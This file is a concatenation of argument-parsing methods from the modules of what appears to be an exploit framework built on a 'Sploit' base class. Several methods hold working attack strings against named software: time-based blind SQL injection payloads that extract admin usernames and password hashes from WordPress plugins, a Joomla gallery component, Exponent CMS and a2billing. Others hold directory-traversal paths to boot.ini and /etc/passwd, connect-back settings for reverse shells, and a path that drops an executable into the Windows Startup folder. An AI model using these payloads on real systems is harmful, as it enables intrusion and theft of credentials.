def args(self): self.args = Sploit.args(self, OPTIONS) if self.args['listener']: self.listener_port = self.args['listener']['PORT'] else: self.log("[-] Please enable listener in module options dialog") self.finish(False)
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', OPTIONS['HOST']) self.port = self.args.get('PORT', OPTIONS['PORT']) self.filename = str( self.args.get('FILENAME/DIRNAME', OPTIONS['FILENAME/DIRNAME'])) self.action = self.args.get('ACTION', OPTIONS['ACTION'])
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', self.host) self.port = int(self.args.get('PORT', self.port)) self.command = self.args.get('COMMAND', self.command) self.username = self.args.get('USERNAME', self.username) self.password = self.args.get('PASSWORD', self.password)
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', self.host) self.port = int(self.args.get('PORT', self.port)) self.path = self.args.get('PATH', OPTIONS['PATH']) self.username = self.args.get('USERNAME', self.username) self.password = self.args.get('PASSWORD', self.password) self.basepath = self.args.get('BASEPATH', self.basepath)
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', self.host) self.port = self.args.get('PORT', self.port) self.login = self.args.get('LOGIN', self.login) self.password = self.args.get('PASSWORD', self.password) self.l_port = int(self.args.get('LISTEN PORT', self.l_port)) return
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', self.host) self.port = int(self.args.get('PORT', self.port)) self.username = self.args.get('USERNAME', self.username) self.password = self.args.get('PASSWORD', self.password) self.basepath = self.args.get('BASEPATH', self.basepath) self.callback_ip = self.args.get('CALLBACK_IP', OPTIONS["CALLBACK_IP"])
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', self.host) self.port = int(self.args.get('PORT', self.port)) self.username = self.args.get('NEW USERNAME') self.password = self.args.get('NEW PASSWORD') self.email = self.args.get('NEW EMAIL') self.basepath = self.args.get('BASEPATH')
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', self.host) self.port = int(self.args.get('PORT', self.port)) self.filename = self.args.get('FILENAME', 'boot.ini') self.url = self.make_url('/%2e%2e/' * 16 + self.filename) return
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get("HOST", self.host) self.port = self.args.get("PORT", self.port) self.depth = self.args.get("DEPTH", self.depth) self.url = self.args.get("URL", self.url) self.system = self.args.get("System", self.system) self.file_name = "/etc/passwd" if "GNU" in self.system else "boot.ini" return
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', self.host) self.port = int(self.args.get('PORT', self.port)) target = self.args.get('TARGET', "Wnd XP Sp2") if '3' in target: self.addr = 0x27155CA return
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get("HOST", self.host) self.from_port = self.args.get("FROM_PORT", self.from_port) self.to_port = self.args.get("TO_PORT", self.to_port) self.nthreads = self.args.get("THREADS", self.nthreads) self.type = self.args.get("SEARCH", "opened") self.scanner = Scanner(self.from_port, self.to_port, self.host) return
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', self.host) self.from_port = self.args.get('FROM_PORT', self.from_port) self.to_port = self.args.get('TO_PORT', self.to_port) self.nthreads = self.args.get('THREADS', self.nthreads) self.type = self.args.get('SEARCH', 'opened') self.scanner = Scanner(self.from_port, self.to_port, self.host) return
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get("HOST", OPTIONS["HOST"]) self.port = self.args.get("PORT", OPTIONS["PORT"]) self.vhost = self.args.get("VHOST", OPTIONS["VHOST"]) self.vhost = self.vhost if not self.vhost.endswith("/") else self.vhost[0:-1] self.path_to_file = self.args.get("PATH TO FILE", OPTIONS["PATH TO FILE"]) self.url = "http://{}:{}/{}/{}{}".format(self.host, self.port, self.vhost, self.vuln_path, self.path_to_file) pass
def args(self): self.args = Sploit.args(self, OPTIONS) ssl = self.args.get("SSL", OPTIONS["SSL"]) protocol = "https://" if ssl else "http://" self.host = self.args.get("HOST", OPTIONS["HOST"]).replace("/", "").replace("\\","") self.port = self.args.get("PORT", OPTIONS["PORT"]) self.connectback_ip = self.args.get("CONNECTBACK_IP", OPTIONS["CONNECTBACK_IP"]) if self.args['listener']: self.connectback_port = self.args['listener']['PORT'] self.url = "{proto}{host}:{port}/".format(proto=protocol, host=self.host, port=self.port)
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get("HOST", self.host).replace("/", "").replace("\\","") self.port = self.args.get("PORT", self.host) self.vhost = self.args.get("VHOST", self.vhost) self.vhost = self.vhost if self.vhost.startswith("/") else ("/" + self.vhost) self.command = self.args.get("COMMAND", self.command) self.url = "http://%s:%s%s" % (self.host, self.port, self.vhost) if not self.url.endswith("/"): self.url += "/"
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', self.host) self.port = int(self.args.get('PORT', self.port)) self.ssl = bool(self.args.get('SSL', self.ssl)) self.basepath = self.args.get('BASEPATH', self.basepath) self.url = self.make_url('/form.php?') self.data = "module_code=1%27 RLIKE (SELECT(CASE WHEN (SUBSTR((SELECT CONCAT(username,CHAR(58),password) FROM ino_user where ino_user_id=1),{pos},1)=CHAR({char})) THEN 1 ELSE 0x28 END))-- EaST" self.data = self.data.replace(' ', '%20')
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', self.host) self.port = int(self.args.get('PORT', self.port)) self.ssl = bool(self.args.get('SSL', self.ssl)) self.ttl = int(self.args.get('TTL', self.ttl)) self.basepath = self.args.get('BASEPATH', self.basepath) self.url = self.make_url('/wp-content/plugins/olimometer/thermometer.php?olimometer_id=1') self.data = "%20and%20SUBSTR((SELECT%20CONCAT(user_login,CHAR(58),user_pass)%20FROM%20wp_users%20where%20id=1),{pos},1)=CHAR({char})%20and%20sleep(5)"
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', OPTIONS["HOST"]) self.port = self.args.get('PORT', OPTIONS["PORT"]) self.path = self.args.get('BASEPATH', OPTIONS["BASEPATH"]) self.ssl = self.args.get('SSL', OPTIONS['SSL']) self.command = self.args.get('COMMAND', OPTIONS["COMMAND"]) proto = "https" if self.ssl else "http" self.url = urlparse.urljoin( "{}://{}:{}/".format(proto, self.host, self.port), self.path)
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', self.host) self.port = int(self.args.get('PORT', self.port)) self.ssl = bool(self.args.get('SSL', self.ssl)) self.ttl = int(self.args.get('TTL', self.ttl)) self.basepath = self.args.get('BASEPATH', self.basepath) self.username = self.args.get('USERNAME', self.username) self.password = self.args.get('PASSWORD', self.password) self.url = self.make_url('/exponent-2.4.0/index.php') self.data = "action=manage_ranks&controller=container&lastpage=http://192.168.1.207/exponent-2.4.0/untitled&model=container&rerank[]=alesha/' AND (SELECT * FROM (select IF((SUBSTRING((SELECT CONCAT(username,CHAR(58),password) FROM exponent_user where id=1),{pos},1)) = CHAR({char}), SLEEP(5), '1'))A) AND 'a'='a&src=@section1"
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', OPTIONS['HOST']) self.port = self.args.get('PORT', OPTIONS['PORT']) self.connectback_ip = self.args.get('CONNECTBACK_IP', OPTIONS['CONNECTBACK_IP']) if not self.args.get('listener'): self.log('[!] Please enable listener') self.finish(False) self.listener_port = self.args['listener']['PORT'] self.filename = '/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup/test.exe'
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get("HOST", self.host) self.port = int(self.args.get("PORT", self.port)) self.ssl = bool(self.args.get("SSL", self.ssl)) self.basepath = self.args.get("BASEPATH", self.basepath) self.url = self.make_url( "/index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1%20RLIKE%20%28SELECT%20%28CASE%20WHEN%20%28substring%28%28select%20concat%28username,char%2858%29,password%29%20from%20{table}%20order%20by%20registerDate%20desc%20limit%201%29,{pos},1%29=char%28{char}%29%29%20THEN%204%20ELSE%200x28%20END%29%29" ) return
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', self.host) self.port = int(self.args.get('PORT', self.port)) self.path = self.args.get('PATH', OPTIONS['PATH']) self.urls = [ 'api/xml?file=/', 'api/xml?file=../../../../../../../../../', 'api/file/download/', 'api/file/content/', 'api/server/videosnap?file=../../../../../../../../../' ]
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', self.host) self.port = int(self.args.get('PORT', self.port)) self.ssl = bool(self.args.get('SSL', self.ssl)) self.ttl = int(self.args.get('TTL', self.ttl)) self.basepath = self.args.get('BASEPATH', self.basepath) self.url = self.make_url( '/wp-content/plugins/olimometer/thermometer.php?olimometer_id=1') self.data = "%20and%20SUBSTR((SELECT%20CONCAT(user_login,CHAR(58),user_pass)%20FROM%20wp_users%20where%20id=1),{pos},1)=CHAR({char})%20and%20sleep(5)"
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', self.host) self.port = int(self.args.get('PORT', self.port)) self.ssl = bool(self.args.get('SSL', self.ssl)) self.basepath = self.args.get('BASEPATH', self.basepath) self.url = self.make_url( '/index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1%20RLIKE%20%28SELECT%20%28CASE%20WHEN%20%28substring%28%28select%20concat%28username,char%2858%29,password%29%20from%20{table}%20order%20by%20registerDate%20desc%20limit%201%29,{pos},1%29=char%28{char}%29%29%20THEN%204%20ELSE%200x28%20END%29%29' ) return
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', self.host) self.port = int(self.args.get('PORT', self.port)) self.filed = self.args.get('FILENAME', self.filed) self.ssl = self.args.get('SSL', self.ssl) if self.ssl: self.url = "https://"+self.host+":"+str(self.port) else: self.url = "http://"+self.host+":"+str(self.port) return
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', self.host) self.port = int(self.args.get('PORT', self.port)) self.path = self.args.get('PATH', OPTIONS['PATH']) self.urls = [ 'Esprit/public/Password.jsp?orgName=../../../../../../../../../', 'Esprit/ES/Login?orgUnitName=../../../../../../../../../', 'dalimws/log?len=10000&download=true&file=../../../../../../../' ]
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', OPTIONS['HOST']) self.port = self.args.get('PORT', OPTIONS['PORT']) self.connectback_ip = self.args.get('CONNECTBACK_IP', OPTIONS['CONNECTBACK_IP']) if self.args['listener']: self.listener_port = self.args['listener']['PORT'] else: self.log('[-] Please enable listener') self.finish(False)
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', self.host) self.port = int(self.args.get('PORT', self.port)) self.basepath = self.args.get('BASEPATH', self.basepath) self.ssl = self.args.get('SSL', self.ssl) if self.ssl: context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) opener = urllib2.build_opener(urllib2.HTTPSHandler(context=context)) urllib2.install_opener(opener)
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', self.host) self.port = int(self.args.get('PORT', self.port)) self.ssl = bool(self.args.get('SSL', self.ssl)) self.ttl = int(self.args.get('TTL', self.ttl)) self.basepath = self.args.get('BASEPATH', self.basepath) self.url = self.make_url('/wp-content/plugins/dtracker/download.php?') self.data = "id=(CASE WHEN (SUBSTR((SELECT CONCAT(user_login,CHAR(58),user_pass) FROM wp_users where id=1),{pos},1)=CHAR({char})) THEN SLEEP(5) ELSE 7148 END)" self.data = self.data.replace(' ', '%20')
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', self.host) self.port = int(self.args.get('PORT', self.port)) self.basepath = self.args.get('BASEPATH', self.basepath) self.username = self.args.get('USERNAME', self.username) self.password = self.args.get('PASSWORD', self.password) self.ssl = self.args.get('SSL', self.ssl) self.cookiesjar = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiesjar)) urllib2.install_opener(opener)
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get("HOST", OPTIONS["HOST"]) self.port = self.args.get("PORT", OPTIONS["PORT"]) self.vhost = self.args.get("VHOST", OPTIONS["VHOST"]) self.vhost = self.vhost if not self.vhost.endswith("/") else self.vhost[0:-1] self.url = "http://{}:{}/{}/".format(self.host, self.port, self.vhost) self.connectback_host = self.args.get("CONNECT_BACK_HOST", OPTIONS["CONNECT_BACK_HOST"]) self.log_file = self.args.get("LOG_FILE", OPTIONS["LOG_FILE"]) self.method = self.args.get("METHOD", OPTIONS["METHOD"]) if self.args['listener']: self.listener_port = self.args['listener']['PORT']
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', OPTIONS["HOST"]) self.ssl = self.args.get('SSL', OPTIONS['SSL']) self.table = self.args.get('TABLE', OPTIONS['TABLE']) self.column = self.args.get('COLUMN', OPTIONS['COLUMN']) self.ttl = self.args.get('TTL', OPTIONS['TTL']) self.debug = self.args.get('SHOW EVERY FOUND SYMBOL', OPTIONS['SHOW EVERY FOUND SYMBOL']) proto = "https" if self.ssl else "http" self.url = "{}://{}".format(proto, self.host) + "/a2billing/customer/iridium_threed.php?transactionID=" self.vuln_data = '-1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,if(ascii(mid(IFNULL(CAST({column} AS CHAR),0x20),{char_pos},1))={char_ord},sleep({ttl}),0) from {table} LIMIT {entry_no},1' self.log(self.url)
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get("HOST", self.host) self.port = int(self.args.get("PORT", self.port)) self.path = self.args.get("PATH", self.path) self.filename = self.args.get("FILENAME", self.filename) self.ssl = bool(self.args.get('SSL', False)) if self.ssl: context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) opener = urllib2.build_opener(urllib2.HTTPSHandler(context=context)) urllib2.install_opener(opener)
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get("HOST", self.host).replace("/", "").replace("\\", "") self.port = self.args.get("PORT", self.host) self.vhost = self.args.get("VHOST", self.vhost) self.vhost = self.vhost if self.vhost.startswith("/") else ("/" + self.vhost) self.command = self.args.get("COMMAND", self.command) self.url = "http://%s:%s%s" % (self.host, self.port, self.vhost) if not self.url.endswith("/"): self.url += "/"
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', self.host) self.port = int(self.args.get('PORT', self.port)) self.ssl = bool(self.args.get('SSL', self.ssl)) self.username = self.args.get('USERNAME', self.username) self.password = self.args.get('PASSWORD', self.password) self.auth_method = self.args.get('AUTH_METHOD', self.auth_method) self.hostname = self.args.get('HOSTNAME', self.hostname) self.template = self.args.get('TEMPLATE', self.template) self.vmid = self.args.get('VMID', self.vmid) return
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', OPTIONS["HOST"]) self.port = self.args.get('PORT', OPTIONS["PORT"]) self.path = self.args.get('BASEPATH', OPTIONS["BASEPATH"]) self.ssl = self.args.get('SSL', OPTIONS['SSL']) self.connectback_ip = self.args.get('CONNECTBACK_IP', OPTIONS["CONNECTBACK_IP"]) if self.args['listener']: self.listener_port = self.args['listener']['PORT'] else: self.log("Please enable listener to recieve connection from remote shell") self.finish(False) proto = "https" if self.ssl else "http" self.url = urlparse.urljoin("{}://{}:{}/".format(proto, self.host, self.port), self.path)
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get("HOST", OPTIONS["HOST"]) self.port = self.args.get("PORT", OPTIONS["PORT"]) self.vhost = self.args.get("VHOST", OPTIONS["VHOST"]) self.vhost = self.vhost if not self.vhost.endswith( "/") else self.vhost[0:-1] self.url = "http://{}:{}/{}/".format(self.host, self.port, self.vhost) self.connectback_host = self.args.get("CONNECT_BACK_HOST", OPTIONS["CONNECT_BACK_HOST"]) self.log_file = self.args.get("LOG_FILE", OPTIONS["LOG_FILE"]) self.method = self.args.get("METHOD", OPTIONS["METHOD"]) if self.args['listener']: self.listener_port = self.args['listener']['PORT']
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', OPTIONS["HOST"]) self.port = self.args.get('PORT', OPTIONS["PORT"]) self.path = self.args.get('BASEPATH', OPTIONS["BASEPATH"]) self.ssl = self.args.get('SSL', OPTIONS['SSL']) self.connectback_ip = self.args.get('CONNECTBACK_IP', OPTIONS['CONNECTBACK_IP']) if self.args['listener']: self.listener_port = self.args['listener']['PORT'] else: self.log("[!] Please enable listener to recieve connection from remote shell") self.finish(False) proto = "https" if self.ssl else "http" self.url = urlparse.urljoin("{}://{}:{}/".format(proto, self.host, self.port), self.path)
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', OPTIONS["HOST"]) self.port = self.args.get('PORT', OPTIONS["PORT"]) self.path = self.args.get('BASEPATH', OPTIONS["BASEPATH"]) self.ssl = self.args.get('SSL', OPTIONS['SSL']) self.ttl = self.args.get('TTL', OPTIONS['TTL']) self.table = self.args.get('TABLE', OPTIONS['TABLE']) self.column = self.args.get('COLUMN', OPTIONS['COLUMN']) self.debug = self.args.get('SHOW EVERY FOUND SYMBOL', OPTIONS['SHOW EVERY FOUND SYMBOL']) proto = "https" if self.ssl else "http" self.url = urlparse.urljoin("{}://{}:{}/".format(proto, self.host, self.port), self.path) + "/load_data_for_search.php?sql=" self.vuln_data = ('SELECT * FROM (SELECT(SLEEP({ttl}-(IF(ORD(MID((SELECT ' '(IFNULL(CAST({column} AS CHAR),0x20)) FROM {table} LIMIT ' '{entry_no},1),{char_pos},1))={char_ord},0,{ttl})))))beSz' )
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', self.host) self.port = int(self.args.get('PORT', self.port)) self.basepath = self.args.get('BASEPATH', self.basepath) self.callback_ip = self.args.get('CALLBACK_IP', OPTIONS["CALLBACK_IP"])
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get("HOST", self.host) self.port = int(self.args.get("PORT", self.port)) self.new_pass = self.args.get("NEW_PASSWORD", OPTIONS["NEW_PASSWORD"]) self.basepath = self.args.get("BASEPATH", self.basepath)
def args(self): self.args = Sploit.args(self, OPTIONS) self.command_exec = self.args.get('COMMAND', self.command_exec) return
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get("HOST", self.host) self.port = int(self.args.get("PORT", self.port)) self.cmd = self.args.get("CMD", self.cmd) return
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', self.host) self.port = int(self.args.get('PORT', self.port)) self.callback_ip = self.args.get('CALLBACK_IP', OPTIONS["CALLBACK_IP"]) self.version = self.args.get('TARGET_VERSION', "9.1.14")
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get("HOST", self.host) self.port = int(self.args.get("PORT", self.port)) self.filename = self.args.get("FILENAME", "c:/boot.ini") return
def args(self): self.args = Sploit.args(self, OPTIONS) self.callback_ip = self.args.get('CALLBACK_IP', OPTIONS["CALLBACK_IP"])
def args(self): self.args = Sploit.args(self, OPTIONS) return
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', self.host) self.port = int(self.args.get('PORT', self.port)) return
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get("HOST", self.host) self.port = int(self.args.get("PORT", self.port)) self.callback_ip = self.args.get("CALLBACK_IP", OPTIONS["CALLBACK_IP"]) self.version = self.args.get("TARGET_VERSION", "9.1.16")
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', self.host) if self.args['listener']: port = int(self.args['listener']['PORT']) return
def args(self): self.args = Sploit.args(self, OPTIONS) self.host = self.args.get('HOST', self.host) self.port = int(self.args.get('PORT', self.port)) self.path = self.args.get('PATH', OPTIONS['PATH']) self.basepath = self.args.get('BASEPATH', self.basepath)
def args(self): self.args = Sploit.args(self, OPTIONS) self.port = int(self.args.get('CONNECTBACK_PORT', self.port)) return